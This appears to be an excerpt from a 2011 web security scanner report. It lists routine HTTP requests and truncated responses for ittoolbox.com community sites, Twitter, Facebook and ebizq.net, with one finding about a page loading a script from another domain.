HTTP/1.1 200 OK Cache-Control: private Content-Length: 79052 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Groups
GET / HTTP/1.1 Host: java.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 59140 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=oyzpf135dvjl5u4503tynefb; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:01 GMT Connection: close
GET / HTTP/1.1 Host: knowledgemanagement.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71256 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=b5wett3jdmxpvtvb4e4glymn; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Knowledge M ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/km.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=knowledge;kw=management;kw=km;kw=exchange;kw=office;kw=sharepoint;kw=systemcenter;kw=communication;kw=collaboration;kw=document;kw=management;kw=content;kw=archiving;kw=authoring;kw=publishing;kw=indexing;kw=sharing;kw=information;kw=webcontent;kw=workflow;kw=e-learning;kw=suites;kw=conferencing;kw=droopal;kw=joomla;kw=wordpress;kw=blackboard;kw=imaging;kw=instantmessenger;kw=adobe;kw=hp;kw=oracle;kw=filenet;kw=streamserve;kw=ibm;kw=jetforms;kw=opentext;kw=vignette;kw=performance;kw=businessintelligence;kw=;sz=728x90,468x60,1x1;tile=6;ord=1347365883?">
GET / HTTP/1.1 Host: linux.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72604 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=fxf05445egzyff3bwiyjik3x; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Linux Commu ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/linux.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=Linux;kw=Ubuntu;kw=Fedora;kw=RedHat;kw=RHEL;kw=Debian;kw=GNOME;kw=GNU;kw=KDE;kw=kernel;kw=mandriva;kw=mandrake;kw=security;kw=administration;kw=slackware;kw=SUSE;kw=Turbolinux;kw=xwindow;kw=centos;kw=server;kw=software;kw=free;kw=enterprise;kw=hosting;sz=728x90,468x60,1x1;tile=6;ord=660989816?">
GET / HTTP/1.1 Host: networking.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 91759 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=5kuwlnb05jml5f45ib34n555; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:14 GMT Connection: close
GET / HTTP/1.1 Host: oracle.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 78126 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=dnzjqj45bhnnumaespuasb45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Oracle Comm ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/oracle.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=Oracle;kw=OracleCorporation;kw=OracleCRM;kw=OracleDatabase;kw=OracleT-SQL;kw=OracleSCM;kw=OracleERP;kw=SunMicroSystems;kw=Siebel;kw=PeopleSoft;kw=JDEdwards;kw=Retek;kw=AgileSoftwareCorporation;kw=OracleApplications;kw=OracleSoftware;kw=OracleSolutions;kw=OLAP;kw=OracleApplicationServers;kw=OracleBI;kw=OracleJDeveloper;kw=OracleGrid;sz=728x90,468x60,1x1;tile=6;ord=1367833762?">
GET / HTTP/1.1 Host: peoplesoft.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70995 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=fjxtzvek1n24rc3qv05z1gbj; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:21 GMT Connection: close
GET / HTTP/1.1 Host: pragdave.pragprog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET / HTTP/1.1 Host: projectmanagement.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70396 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=x1kl5s4525t13p45bqmqziut; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Project Man ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=ProjectManagement;kw=PMO;kw=PMP;kw=PM;kw=Agile;kw=PMBOK;kw=ProjectLifecycleManagement;kw=Scrum;kw=MSProject;kw=Visio;kw=ProjectManagemnetCareer;kw=RUP;kw=ProjectMethodology;kw=projectmanagementsoftware;sz=728x90,468x60,1x1;tile=6;ord=1730388164?">
GET / HTTP/1.1 Host: sap.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 83566 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=uelcsg55rouamz55yuh1o455; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> SAP Communi ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/sap.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=sap;kw=erp;kw=crm;kw=enterprise;kw=software;kw=applications;kw=r%2f1;kw=r%2f2;kw=r%2f3;kw=soa;kw=netweaver;kw=customerrelationshipmanagement(CRM);kw=productlifecyclemanagement(PLM);kw=supplychainmanagement(SCM);kw=supplierrelationshipmanagement(SRM);kw=Governance;kw=RiskandCompliance(GRC);kw=duet;kw=soa;kw=businessone;kw=AdvancedPlannerandOptimizer(APO);kw=BusinessInformationWarehouse(BW);kw=basis;kw=abap;kw=development;kw=hr;kw=logistics;kw=implementation;kw=career;kw=administration;kw=security;kw=;sz=728x90,468x60,1x1;tile=6;ord=1751868068?">
GET / HTTP/1.1 Host: security.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 81934 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=mruc2m45webcko55sgy2f5jm; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Security Co ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/security.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=security;kw=securityadministration;kw=threats;kw=malware;kw=hacker;kw=firewall;kw=antivirus;kw=securityanalyst;kw=filtering;kw=Encryption;kw=Cryptography;kw=IntrusionDetection;kw=Prevention;kw=Vulnerabilities;kw=compliance;kw=SOX;kw=HIPAA;kw=sarbanesoxley;kw=authorization;kw=Intrusion;sz=728x90,468x60,1x1;tile=6;ord=520871755?">
GET / HTTP/1.1 Host: sethgodin.typepad.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET / HTTP/1.1 Host: siebel.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72499 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=yvvy0cefbpzquq2it2cgzprn; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Siebel Comm ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/siebel.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=Siebel;kw=CRM;kw=CustomerRelationshipManagement;kw=EIM;kw=EnterpriseIncentiveManagement;kw=PRM;kw=PartnerRelationshipManagement;kw=Projectmanagement;kw=Administration;kw=SiebelAnalytics;kw=SiebelCallCenter;kw=SiebelDevelopment;kw=SiebelMarketing;kw=SiebelManagement;kw=SiebelSales;kw=upgrades;kw=systems;kw=application;kw=integration;sz=728x90,468x60,1x1;tile=6;ord=304030505?">
GET / HTTP/1.1 Host: storage.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71718 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=qoshvh55jsp2ig55kw2vi245; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Storage Com ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/storage.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=CloudComputing;kw=Virtuatlization;kw=Desktopvirtualization;kw=NAS;kw=DAS;kw=SAN;kw=Backup;kw=Recovery;kw=StorageHardware;kw=Brocade;kw=EMC;kw=Tivoli;kw=Veritas;kw=storagemanagement;kw=storage;kw=computerstorage;kw=serverhardware;kw=servers;sz=728x90,468x60,1x1;tile=6;ord=2096608598?">
GET / HTTP/1.1 Host: supplychain.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 74807 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=rqqjl3aklble05amudmoqvyc; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:42 GMT Connection: close
GET / HTTP/1.1 Host: telephony.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 62475 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3eypwe552rukfx2gthccur2v; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox for ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/telephony.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=;sz=728x90,468x60,1x1;tile=6;ord=1203364972?">
GET /toolboxdotcom HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 26 Jan 2011 14:56:29 GMT Server: hi Status: 200 OK X-Transaction: 1296053789-52552-6574 ETag: "cba3bfc96bf68c050adb0ae164dc8175" Last-Modified: Wed, 26 Jan 2011 14:56:29 GMT X-Runtime: 0.01600 Content-Type: text/html; charset=utf-8 Content-Length: 51936 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296053788039947; path=/; expires=Wed, 02-Feb-11 14:56:28 GMT; domain=.twitter.com Set-Cookie: guest_id=129605378903672234; path=/; expires=Fri, 25 Feb 2011 14:56:29 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWY4MmYzNTRlZWE2MzBkYjZlMzAxMGM2YmExZmIzMTAwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIbmHTwi0B--5f068f484769ee483f9eaf437005d73e90b46f16; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]... </div>
GET /toolboxforit HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 26 Jan 2011 14:56:27 GMT Server: hi Status: 200 OK X-Transaction: 1296053787-90115-59528 ETag: "88e9aa64188f9d64f88986da2628b13f" Last-Modified: Wed, 26 Jan 2011 14:56:27 GMT X-Runtime: 0.01067 Content-Type: text/html; charset=utf-8 Content-Length: 45652 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296053787142478; path=/; expires=Wed, 02-Feb-11 14:56:27 GMT; domain=.twitter.com Set-Cookie: guest_id=129605378737979704; path=/; expires=Fri, 25 Feb 2011 14:56:27 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTljM2MwNTc3NjdjNTdhMzAyZDA4OTRlY2U5NzliMjM0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI9VrTwi0B--bba18e9789744f8014c5ff57c43fcea71113a57e; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]... </div>
GET / HTTP/1.1 Host: unix.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 80502 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ciicu055vtcjje45vlgvahbj; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:56 GMT Connection: close
GET / HTTP/1.1 Host: visualbasic.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63969 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=pr5xja553zbb0s45ijt4gx45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Visual Basi ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/visualbasic.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=visualbasic;kw=vb;kw=.net;kw=visualbasic.net;kw=.netframework;kw=developer;kw=visualbasicdeveloper;kw=.netdeveloper;kw=development;kw=programming;kw=.netdevelopment;kw=visualstudio;kw=vb6;kw=microsoft.net;kw=ms.net;sz=728x90,468x60,1x1;tile=6;ord=1527672427?">
GET / HTTP/1.1 Host: webdesign.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79392 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=e3e0aj55kknpbv2uorfonxy4; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Web Design ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/webdesign.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=webdesign;kw=webdevelopment;kw=webdesigner;kw=webdeveloper;kw=css;kw=asp;kw=asp.net;kw=perl;kw=python;kw=php;kw=graphic;kw=html;kw=xml;kw=ruby;kw=rails;kw=javascript;kw=adobe;kw=seo;kw=searchengine;kw=hosting;sz=728x90,468x60,1x1;tile=6;ord=1241205491?">
GET / HTTP/1.1 Host: windows.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 77587 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=nseiegiwhp2img3lqow10z3v; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Windows Com ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/windows.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=windows;kw=microsoft;kw=operatingsystem;kw=exchange;kw=forefront;kw=office;kw=servers;kw=sharepoint;kw=systemcenter;kw=windows7;kw=networkadministration;kw=unifiedcommunicatiosn;kw=desktopOS;kw=activedirectory;kw=vista;kw=nt;kw=xp;kw=iis;kw=isa;kw=sms;kw=ce;kw=me;kw=2008;kw=95;kw=98;kw=2000;kw=certification;kw=training;kw=dos;kw=2003;kw=home;kw=server;kw=update;kw=patch;kw=shell;kw=defender;kw=spyware;kw=adware;kw=virus;kw=ms-dos;kw=opensource;kw=;sz=728x90,468x60,1x1;tile=6;ord=1485277909?">
GET / HTTP/1.1 Host: wireless.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73493 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ssd5o2akjvnbi055fht5lga2; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Wireless Co ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/wireless.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=Wireless;kw=networks;kw=networking;kw=smartphones;kw=MAN;kw=WLAN;kw=WWAN;kw=;kw=WAP;kw=3g;kw=4g;kw=wifi;kw=wimax;kw=hubs;kw=routers;kw=modems;kw=handhelds;kw=mobile;kw=computing;kw=PDAs;kw=iphone;kw=android;kw=rim;kw=blackberry;kw=ethernet;kw=bluetooth;kw=gsm;kw=wirelessbroadband;kw=wep;kw=security;kw=cdma;kw=linksys;kw=netgear;kw=d-link;kw=palm;kw=voip;kw=vowifi;kw=mobiledata;kw=htc;kw=motorola;kw=sms;kw=mms;kw=windows;kw=ipad;kw=wi-fi;kw=belkin;kw=LTE;kw=evdo;kw=google;kw=nexusone;kw=ctia;kw=fixedmobileconvergence;kw=hotspots;kw=801.11x;kw=rfid;kw=;sz=728x90,468x60,1x1;tile=6;ord=387836470?">
The response dynamically includes the following script from another domain:
http://munchkin.marketo.net/munchkin.js
Request
GET /blogs/saasweek/ HTTP/1.1 Host: www.ebizq.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:56:55 GMT Server: Apache/2.0.46 (Red Hat) Accept-Ranges: bytes X-Powered-By: PHP/4.3.2 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56022
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="six ...[SNIP]... </script>
GET /pages/Toolboxcom/117012708708 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=ODZATe8iFsKm4n_Xjpn2xOrf; expires=Fri, 25-Jan-2013 14:56:56 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=4TIUB; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Wed, 26 Jan 2011 14:56:57 GMT Content-Length: 154510
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]... <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />
